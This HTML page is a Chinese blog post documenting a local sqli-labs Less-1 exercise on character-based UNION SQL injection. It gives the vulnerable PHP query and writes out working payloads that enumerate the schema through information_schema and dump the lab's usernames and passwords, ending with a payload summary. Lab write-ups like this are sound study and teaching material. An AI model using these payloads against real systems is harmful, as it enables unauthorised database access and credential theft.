<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>sqli-labs Less-1：字符型联合查询注入学习记录 | 与猫为邻的小站</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.woff2"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><meta name="page-config" content="{&quot;code_fold&quot;:null}"><script class="pjax-js">var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}};
var page_config = {
  code_fold: null
};
function updatePageConfig() {
  var newPageConfig = document.querySelector('meta[name="page-config"]');
  if (newPageConfig) {
    page_config = JSON.parse(newPageConfig.content);
  }
}
document.addEventListener('pjax:complete', function() { updatePageConfig(); });
updatePageConfig();</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><style defer src="/css/music-player.css"></style><link rel="stylesheet" href="/css/music-player.css"><style defer src="/css/live2d-anan.css?v=20260512a"></style><link rel="stylesheet" href="/css/live2d-anan.css?v=20260512a"><style defer src="/css/friend-links.css?v=20260511b"></style><link rel="stylesheet" href="/css/friend-links.css?v=20260511b"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
const postBg = document.querySelector('#post-bg');
if (postBg) lightGallery(postBg, {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 8.1.1"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/links/"><span class="navItemTitle">Link</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>sqli-labs Less-1：字符型联合查询注入学习记录</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2026-05-13T12:00:00.000Z" id="date"> 2026-05-13</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2026-05-13T12:48:17.769Z" id="updated"> 2026-05-13</time></div></span></div></div><hr><div id="post-content"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>本篇文章记录 sqli-labs Less-1 的学习过程。Less-1 是一个典型的 <strong>GET 型字符型 SQL 注入</strong> 关卡，主要用于练习 SQL 注入的基础判断、字段数判断、回显位判断以及联合查询读取数据。<br>本文所有操作均在本地靶场环境中完成，仅用于网络安全学习和漏洞原理分析。</p>
<hr>
<h2 id="一、实验环境"><a href="#一、实验环境" class="headerlink" title="一、实验环境"></a>一、实验环境</h2><p>本次实验环境如下：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs text">操作系统：Windows<br>Web 环境：phpStudy / 小皮面板<br>Web 服务：Apache<br>数据库：MySQL 5.7<br>PHP 版本：PHP 5.6<br>靶场：sqli-labs<br>关卡：Less-1<br>访问地址：http://127.0.0.1/sqli-labs/Less-1/<br></code></pre></td></tr></table></figure>

<p>初始化数据库后，访问：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=1<br></code></pre></td></tr></table></figure>

<p>页面正常显示：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs text">Your Login name:Dumb<br>Your Password:Dumb<br></code></pre></td></tr></table></figure>

<p>这说明 Apache、PHP、MySQL 和 sqli-labs 数据库均已正常运行。</p>
<figure style="margin: 1.5rem auto; text-align: center;" class='item-img' data-src='/img/less1-error.png'><img src="/img/less1-error.png" alt="Less-1 正常访问页面" loading="lazy" style="display: block; width: min(100%, 920px); height: auto; margin: 0 auto; border-radius: 8px; box-shadow: 0 8px 24px rgba(0, 0, 0, 0.18);">
</figure>

<hr>
<h2 id="二、漏洞成因分析"><a href="#二、漏洞成因分析" class="headerlink" title="二、漏洞成因分析"></a>二、漏洞成因分析</h2><p>Less-1 的核心问题是后端直接将用户输入拼接到 SQL 语句中。<br>后台逻辑大致类似：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$id</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;id&#x27;</span>];<br><span class="hljs-variable">$sql</span> = <span class="hljs-string">&quot;SELECT * FROM users WHERE id=&#x27;<span class="hljs-subst">$id</span>&#x27; LIMIT 0,1&quot;</span>;<br></code></pre></td></tr></table></figure>

<p>可以看到，参数 <code>id</code> 被单引号包裹，并直接拼接进 SQL 语句。<br>当用户正常访问：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">?id=1<br></code></pre></td></tr></table></figure>

<p>最终 SQL 语句类似：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> users <span class="hljs-keyword">WHERE</span> id<span class="hljs-operator">=</span><span class="hljs-string">&#x27;1&#x27;</span> LIMIT <span class="hljs-number">0</span>,<span class="hljs-number">1</span>;<br></code></pre></td></tr></table></figure>

<p>这是正常查询。<br>但是如果用户输入特殊内容，例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">?id=1&#x27;<br></code></pre></td></tr></table></figure>

<p>最终 SQL 语句可能变成：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> users <span class="hljs-keyword">WHERE</span> id<span class="hljs-operator">=</span><span class="hljs-string">&#x27;1&#x27;&#x27; LIMIT 0,1;</span><br></code></pre></td></tr></table></figure>

<p>此时引号闭合异常，SQL 语法被破坏，数据库返回报错信息。<br>这说明用户输入没有经过安全处理，存在 SQL 注入风险。</p>
<figure style="margin: 1.5rem auto; text-align: center;" class='item-img' data-src='/img/屏幕截图 2026-05-12 201909.png'><img src="/img/屏幕截图 2026-05-12 201909.png" alt="单引号测试报错" loading="lazy" style="display: block; width: min(100%, 920px); height: auto; margin: 0 auto; border-radius: 8px; box-shadow: 0 8px 24px rgba(0, 0, 0, 0.18);">
</figure>

<hr>
<h2 id="三、判断是否存在注入"><a href="#三、判断是否存在注入" class="headerlink" title="三、判断是否存在注入"></a>三、判断是否存在注入</h2><p>首先访问：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27;<br></code></pre></td></tr></table></figure>

<p>页面返回 SQL 报错：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">You have an error in your SQL syntax<br></code></pre></td></tr></table></figure>

<p>这说明单引号进入了后端 SQL 语句，并破坏了原本的 SQL 结构。<br>因此可以判断：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">Less-1 存在字符型 SQL 注入<br></code></pre></td></tr></table></figure>

<p>这里之所以称为“字符型注入”，是因为参数在 SQL 中被单引号包裹：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-string">&#x27;$id&#x27;</span><br></code></pre></td></tr></table></figure>

<p>所以后续注入时需要先使用单引号闭合前面的字符串。</p>
<hr>
<h2 id="四、判断字段数"><a href="#四、判断字段数" class="headerlink" title="四、判断字段数"></a>四、判断字段数</h2><p>联合查询注入需要知道原查询有多少个字段，否则 <code>UNION SELECT</code> 的字段数量不一致会导致报错。<br>使用 <code>ORDER BY</code> 判断字段数。<br>依次测试：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27; order by 1--+<br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27; order by 2--+<br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27; order by 3--+<br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27; order by 4--+<br></code></pre></td></tr></table></figure>

<p>测试结果如下：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs text">order by 1 正常<br>order by 2 正常<br>order by 3 正常<br>order by 4 报错<br></code></pre></td></tr></table></figure>

<p>当执行 <code>order by 4</code> 时，页面提示：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">Unknown column &#x27;4&#x27; in &#x27;order clause&#x27;<br></code></pre></td></tr></table></figure>

<p>说明原查询中不存在第 4 列，因此字段数为：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">3<br></code></pre></td></tr></table></figure>

<figure style="margin: 1.5rem auto; text-align: center;" class='item-img' data-src='/img/less1-tables.png'><img src="/img/less1-tables.png" alt="order by 3 正常" loading="lazy" style="display: block; width: min(100%, 920px); height: auto; margin: 0 auto; border-radius: 8px; box-shadow: 0 8px 24px rgba(0, 0, 0, 0.18);">
</figure>

<figure style="margin: 1.5rem auto; text-align: center;" class='item-img' data-src='/img/less1-columns.png'><img src="/img/less1-columns.png" alt="order by 4 报错" loading="lazy" style="display: block; width: min(100%, 920px); height: auto; margin: 0 auto; border-radius: 8px; box-shadow: 0 8px 24px rgba(0, 0, 0, 0.18);">
</figure>

<hr>
<h2 id="五、判断回显位"><a href="#五、判断回显位" class="headerlink" title="五、判断回显位"></a>五、判断回显位</h2><p>字段数确定为 3 后，可以使用 <code>UNION SELECT</code> 判断哪些字段会显示到页面上。<br>Payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,2,3--+<br></code></pre></td></tr></table></figure>

<p>页面显示：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs text">Your Login name:2<br>Your Password:3<br></code></pre></td></tr></table></figure>

<p>说明第 2 列和第 3 列会回显到页面中。<br>因此后续读取数据库信息时，需要将想要显示的数据放到第 2 列或第 3 列。<br>例如：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,想显示的数据,<span class="hljs-number">3</span><br></code></pre></td></tr></table></figure>

<figure style="margin: 1.5rem auto; text-align: center;" class='item-img' data-src='/img/less1-normal.png'><img src="/img/less1-normal.png" alt="判断回显位" loading="lazy" style="display: block; width: min(100%, 920px); height: auto; margin: 0 auto; border-radius: 8px; box-shadow: 0 8px 24px rgba(0, 0, 0, 0.18);">
</figure>

<hr>
<h2 id="六、获取当前数据库名"><a href="#六、获取当前数据库名" class="headerlink" title="六、获取当前数据库名"></a>六、获取当前数据库名</h2><p>使用 MySQL 内置函数 <code>database()</code> 获取当前数据库名。<br>Payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,database(),3--+<br></code></pre></td></tr></table></figure>

<p>页面显示：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs text">Your Login name:security<br>Your Password:3<br></code></pre></td></tr></table></figure>

<p>说明当前数据库名为：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">security<br></code></pre></td></tr></table></figure>

<figure style="margin: 1.5rem auto; text-align: center;" class='item-img' data-src='/img/less1-orderby3.png'><img src="/img/less1-orderby3.png" alt="获取当前数据库名" loading="lazy" style="display: block; width: min(100%, 920px); height: auto; margin: 0 auto; border-radius: 8px; box-shadow: 0 8px 24px rgba(0, 0, 0, 0.18);">
</figure>

<hr>
<h2 id="七、获取当前数据库中的表名"><a href="#七、获取当前数据库中的表名" class="headerlink" title="七、获取当前数据库中的表名"></a>七、获取当前数据库中的表名</h2><p>MySQL 中的 <code>information_schema</code> 是系统自带的元数据库，里面保存了数据库、表、字段等结构信息。<br>查询当前数据库中的所有表名：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+<br></code></pre></td></tr></table></figure>

<p>页面显示：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">emails,referers,uagents,users<br></code></pre></td></tr></table></figure>

<p>说明 <code>security</code> 数据库中存在以下表：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs text">emails<br>referers<br>uagents<br>users<br></code></pre></td></tr></table></figure>

<p>其中，<code>users</code> 表通常保存用户账号和密码信息，是本关的重点目标表。</p>
<figure style="margin: 1.5rem auto; text-align: center;" class='item-img' data-src='/img/less1-orderby4.png'><img src="/img/less1-orderby4.png" alt="获取表名" loading="lazy" style="display: block; width: min(100%, 920px); height: auto; margin: 0 auto; border-radius: 8px; box-shadow: 0 8px 24px rgba(0, 0, 0, 0.18);">
</figure>

<hr>
<h2 id="八、获取-users-表字段名"><a href="#八、获取-users-表字段名" class="headerlink" title="八、获取 users 表字段名"></a>八、获取 users 表字段名</h2><p>继续查询 <code>users</code> 表中的字段名。<br>Payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database()--+<br></code></pre></td></tr></table></figure>

<p>页面显示类似：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">id,username,password<br></code></pre></td></tr></table></figure>

<p>说明 <code>users</code> 表中存在以下字段：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs text">id<br>username<br>password<br></code></pre></td></tr></table></figure>

<p>其中：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs text">username：用户名<br>password：密码<br></code></pre></td></tr></table></figure>

<figure style="margin: 1.5rem auto; text-align: center;" class='item-img' data-src='/img/less1-union-position.png'><img src="/img/less1-union-position.png" alt="获取字段名" loading="lazy" style="display: block; width: min(100%, 920px); height: auto; margin: 0 auto; border-radius: 8px; box-shadow: 0 8px 24px rgba(0, 0, 0, 0.18);">
</figure>

<hr>
<h2 id="九、读取-users-表中的数据"><a href="#九、读取-users-表中的数据" class="headerlink" title="九、读取 users 表中的数据"></a>九、读取 users 表中的数据</h2><p>已知表名和字段名后，可以直接读取 <code>users</code> 表中的数据。<br>Payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,group_concat(username,0x3a,password),3 from users--+<br></code></pre></td></tr></table></figure>

<p>其中：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">0x3a<br></code></pre></td></tr></table></figure>

<p>表示英文冒号 <code>:</code>，用于分隔用户名和密码。<br>页面返回类似结果：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs text">Dumb:Dumb<br>Angelina:I-kill-you<br>Dummy:p@ssword<br>secure:crappy<br>stupid:stupidity<br>superman:genious<br>batman:mob!le<br>admin:admin<br></code></pre></td></tr></table></figure>

<p>这说明已经成功通过联合查询注入读取到了 <code>users</code> 表中的用户数据。</p>
<figure style="margin: 1.5rem auto; text-align: center;" class='item-img' data-src='/img/less1-database.png'><img src="/img/less1-database.png" alt="读取 users 表数据" loading="lazy" style="display: block; width: min(100%, 920px); height: auto; margin: 0 auto; border-radius: 8px; box-shadow: 0 8px 24px rgba(0, 0, 0, 0.18);">
</figure>

<hr>
<h2 id="十、完整攻击流程总结"><a href="#十、完整攻击流程总结" class="headerlink" title="十、完整攻击流程总结"></a>十、完整攻击流程总结</h2><p>Less-1 的完整 SQL 注入流程如下：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs text">1. 使用单引号测试，判断是否存在注入<br>2. 根据报错判断为字符型注入<br>3. 使用 order by 判断字段数<br>4. 使用 union select 判断回显位<br>5. 使用 database() 获取当前数据库名<br>6. 查询 information_schema.tables 获取表名<br>7. 查询 information_schema.columns 获取字段名<br>8. 查询 users 表获取账号和密码<br></code></pre></td></tr></table></figure>

<p>核心 Payload 汇总如下：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27; order by 3--+</span><br></code></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27; order by 4--+</span><br></code></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span><span class="hljs-string">&#x27; union select 1,2,3--+</span><br></code></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span><span class="hljs-string">&#x27; union select 1,database(),3--+</span><br></code></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span><span class="hljs-string">&#x27; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+</span><br></code></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span><span class="hljs-string">&#x27; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&#x27;</span>users<span class="hljs-string">&#x27; and table_schema=database()--+</span><br></code></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span><span class="hljs-string">&#x27; union select 1,group_concat(username,0x3a,password),3 from users--+</span><br></code></pre></td></tr></table></figure>

<hr>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2026/05/13/sqli-labs-less-2/">← 下一篇 sqli-labs Less-2：数字型联合查询注入学习记录</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2026/04/27/sql-injection-lab-summary-clean/">SQL 注入实验复盘：字符串拼接与参数化查询对照 上一篇 →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="文章目录">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/">与猫为邻</a></h1><div id="description"><p></p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/YuMaoWeiLin"><i class="fab fa-github" alt="GitHub"></i></a></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="toc-number">2.</span> <span class="toc-text">一、实验环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0%E5%88%86%E6%9E%90"><span class="toc-number">3.</span> <span class="toc-text">二、漏洞成因分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E6%B3%A8%E5%85%A5"><span class="toc-number">4.</span> <span class="toc-text">三、判断是否存在注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E5%88%A4%E6%96%AD%E5%AD%97%E6%AE%B5%E6%95%B0"><span class="toc-number">5.</span> <span class="toc-text">四、判断字段数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%94%E3%80%81%E5%88%A4%E6%96%AD%E5%9B%9E%E6%98%BE%E4%BD%8D"><span class="toc-number">6.</span> <span class="toc-text">五、判断回显位</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AD%E3%80%81%E8%8E%B7%E5%8F%96%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D"><span class="toc-number">7.</span> <span class="toc-text">六、获取当前数据库名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%83%E3%80%81%E8%8E%B7%E5%8F%96%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%AD%E7%9A%84%E8%A1%A8%E5%90%8D"><span class="toc-number">8.</span> <span class="toc-text">七、获取当前数据库中的表名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AB%E3%80%81%E8%8E%B7%E5%8F%96-users-%E8%A1%A8%E5%AD%97%E6%AE%B5%E5%90%8D"><span class="toc-number">9.</span> <span class="toc-text">八、获取 users 表字段名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B9%9D%E3%80%81%E8%AF%BB%E5%8F%96-users-%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%95%B0%E6%8D%AE"><span class="toc-number">10.</span> <span class="toc-text">九、读取 users 表中的数据</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E3%80%81%E5%AE%8C%E6%95%B4%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B%E6%80%BB%E7%BB%93"><span class="toc-number">11.</span> <span class="toc-text">十、完整攻击流程总结</span></a></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script defer src="/js/music-player.js"></script><script defer src="/js/vendor/live2d/live2dcubismcore.min.js?v=20260509c"></script><script defer src="/js/vendor/live2d/pixi.min.js?v=20260509c"></script><script defer src="/js/vendor/live2d/pixi-live2d-display.min.js?v=20260509c"></script><script defer src="/js/live2d-anan.js?v=20260511g"></script></body></html>